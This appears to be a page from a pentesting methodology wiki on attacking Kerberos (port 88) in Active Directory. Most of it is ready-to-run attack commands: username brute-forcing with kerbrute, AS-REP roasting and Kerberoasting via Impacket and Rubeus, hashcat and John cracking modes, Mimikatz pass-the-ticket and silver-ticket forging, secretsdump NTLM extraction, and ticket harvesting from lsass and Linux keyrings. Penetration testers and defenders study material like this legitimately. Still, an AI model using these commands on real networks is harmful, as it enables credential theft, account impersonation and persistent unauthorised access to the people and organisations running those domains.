Kerberos - Port 88
Master pentesting Kerberos on port 88 with VeryLazyTech’s lazy methodology—exploits included!
Basic Information
Kerberos operates on a principle where it authenticates users without directly managing their access to resources. This is an important distinction because it underlines the protocol's role in security frameworks.
In environments like Active Directory, Kerberos is instrumental in establishing the identity of users by validating their secret passwords. This process ensures that each user's identity is confirmed before they interact with network resources. However, Kerberos does not extend its functionality to evaluate or enforce the permissions a user has over specific resources or services. Instead, it provides a secure way of authenticating users, which is a critical first step in the security process.
After authentication by Kerberos, the decision-making process regarding access to resources is delegated to individual services within the network. These services are then responsible for evaluating the authenticated user's rights and permissions, based on the information provided by Kerberos about the user's privileges. This design allows for a separation of concerns between authenticating the identity of users and managing their access rights, enabling a more flexible and secure approach to resource management in distributed networks.
To learn how to abuse Kerberos you should read the post about Active Directory.
Default Port: 88/tcp/udp
PORT STATE SERVICE
88/tcp open kerberos-sec
Discovering Kerberos Services
The first step is identifying Kerberos services on the target network. Port scanning tools are essential here.
Nmap Scan for Kerberos (Port 88):
nmap -p 88 --open -sU -sT <target IP> -Pn -oN kerberos_scan.txt
This command performs both TCP and UDP scans to identify open Kerberos ports. Scanning both protocols is crucial since Kerberos can operate on either.
Masscan for Larger Networks:
masscan -p88 --rate=1000 <target network>
Masscan is faster than Nmap for large networks, though it may not be as precise. After detecting Kerberos, use Nmap to gather more detailed information.
Enumerate Kerberos User Accounts
User account enumeration is a powerful starting point in Kerberos. Attackers can brute-force or enumerate valid usernames.
Kerbrute:
kerbrute userenum -d <domain> -U <userlist.txt> <target IP>
Kerbrute is designed specifically for brute-forcing Kerberos usernames and can provide insight into valid users within the domain.
Impacket’s GetNPUsers.py for AS-REP Roasting:
GetNPUsers.py <domain> -usersfile users.txt -format john -outputfile hashes.txt
If pre-authentication is disabled,
GetNPUsers.py
helps identify accounts vulnerable to AS-REP roasting by obtaining encrypted data that can be cracked offline.
RPCClient User Enumeration:
rpcclient -U "" -N <target IP>
rpcclient
can be used to enumerate usernames if anonymous login is allowed on the server. This step often supplements Kerberos user enumeration.
Testing for Pre-Authentication Bypass (AS-REP Roasting)
AS-REP roasting exploits accounts without pre-authentication enabled, allowing attackers to retrieve an encrypted timestamp that can be brute-forced offline.
Impacket’s GetNPUsers.py (for AS-REP Roasting):
GetNPUsers.py <domain> -usersfile <userlist.txt> -no-pass -dc-ip <target IP>
Running this without passwords will attempt to identify accounts where pre-authentication is disabled, providing hashes that attackers can brute-force offline.
Offline Cracking with Hashcat:
hashcat -m 18200 hashes.txt wordlist.txt
Hashcat, using mode
18200
, cracks AS-REP hashes. Use a robust wordlist to attempt decrypting the hash for possible credentials.
Performing Kerberoasting
Kerberoasting targets service accounts, allowing attackers to obtain service principal names (SPNs) and then request a ticket to perform offline cracking.
Gather SPNs with Impacket’s GetUserSPNs.py:
GetUserSPNs.py <domain>/<user>:<password> -dc-ip <target IP> -request
This command extracts SPNs, which are service accounts registered within Active Directory. By obtaining these SPNs, attackers can attempt to crack them offline.
Using Rubeus for Kerberoasting (on Windows):
Rubeus.exe kerberoast
Rubeus is a powerful Kerberos manipulation tool. The
kerberoast
command will list all the service tickets that can be used for offline cracking.
Offline Cracking with John the Ripper:
john --wordlist=wordlist.txt hashes.txt
John the Ripper can also be used to crack service account hashes extracted via Kerberoasting, especially if
hashcat
isn’t available.
Pass-the-Ticket (PTT) and Silver Ticket Attacks
In Kerberos, tickets play a crucial role. Attackers who obtain tickets can impersonate legitimate users.
Mimikatz for Pass-the-Ticket Attack:
mimikatz # kerberos::ptt <ticket.kirbi>
Mimikatz allows attackers to inject Kerberos tickets into their session, granting them access to services or resources as the user associated with the ticket.
Generating a Silver Ticket with Mimikatz:
mimikatz # kerberos::golden /domain:<domain> /sid:<domain SID> /target:<service or host> /rc4:<NTLM hash> /user:<username>
ExplanationSilver tickets are forged tickets that target specific services rather than domain-wide (as with Golden Tickets). Silver tickets provide long-term access to a particular service without interacting with the domain controller.
Rubeus for Ticket Extraction:
Rubeus.exe dump
Rubeus can extract all active Kerberos tickets on the machine, providing the attacker with potentially reusable tickets for Pass-the-Ticket attacks.
Password Cracking with AS-REP and Kerberoast Hashes
Offline password cracking is a critical step after obtaining AS-REP or Kerberoast hashes.
Hashcat Cracking for Kerberoast Hashes:
hashcat -m 13100 <hashes.txt> <wordlist>
Mode
13100
in Hashcat is dedicated to Kerberoast hash cracking. This approach can potentially yield the plaintext password of service accounts if a match is found in the wordlist.
Password Cracking with John the Ripper (Kerberoasting):
john --format=krb5tgs --wordlist=<wordlist.txt> hashes.txt
John the Ripper provides a
krb5tgs
format specifically for Kerberos TGS (Ticket Granting Service) hashes, allowing for flexible wordlist cracking.
PowerView: This is a PowerShell tool useful for enumerating Active Directory objects, including SPNs, permissions, and trust relationships.
Import-Module PowerView.ps1
Get-DomainUser -SPN
PowerView provides extensive Active Directory enumeration and is instrumental in identifying Kerberos accounts, SPNs, and potential targets for privilege escalation.
GPPPassword (for Credential Discovery): Although not directly a Kerberos tool, GPPPassword can extract plaintext passwords from Group Policy Preferences, which can sometimes grant access to Kerberos service accounts.
secretsdump.py -just-dc-ntlm <domain>/<user>:<password>@<DC IP>
Harvesting tickets from Windows
Tickets in Windows are managed and stored by the lsass (Local Security Authority Subsystem Service) process, responsible for handling security policies. To extract these tickets, it's necessary to interface with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools Mimikatz and Rubeus are widely employed, each offering different commands and functionalities.
Mimikatz
Mimikatz is a versatile tool that can interact with Windows security. It's used not only for extracting tickets but also for various other security-related operations.
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
Rubeus
Rubeus is a tool specifically tailored for Kerberos interaction and manipulation. It's used for ticket extraction and handling, as well as other Kerberos-related activities.
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Listing all tickets
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
When using these commands, ensure to replace placeholders like <BASE64_TICKET>
and <luid>
with the actual Base64 encoded ticket and Logon ID respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows.
Harvesting tickets from Linux
Credential Storage in Linux
Linux systems store credentials in three types of caches, namely Files (in /tmp
directory), Kernel Keyrings (a special segment in the Linux kernel), and Process Memory (for single-process use). The default_ccache_name variable in /etc/krb5.conf
reveals the storage type in use, defaulting to FILE:/tmp/krb5cc_%{uid}
if not specified.
Extracting Credentials
The 2017 paper, Kerberos Credential Thievery (GNU/Linux), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel's keyring mechanism for managing and storing keys.
Keyring Extraction Overview
The keyctl system call, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The hercules.sh script from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft.
Ticket Extraction Tool: Tickey
Building on the principles of the hercules.sh script, the tickey tool is specifically designed for extracting tickets from keyrings, executed via /tmp/tickey -i
.
Learn & practice Active Directory Methodology.
Last updated
Was this helpful?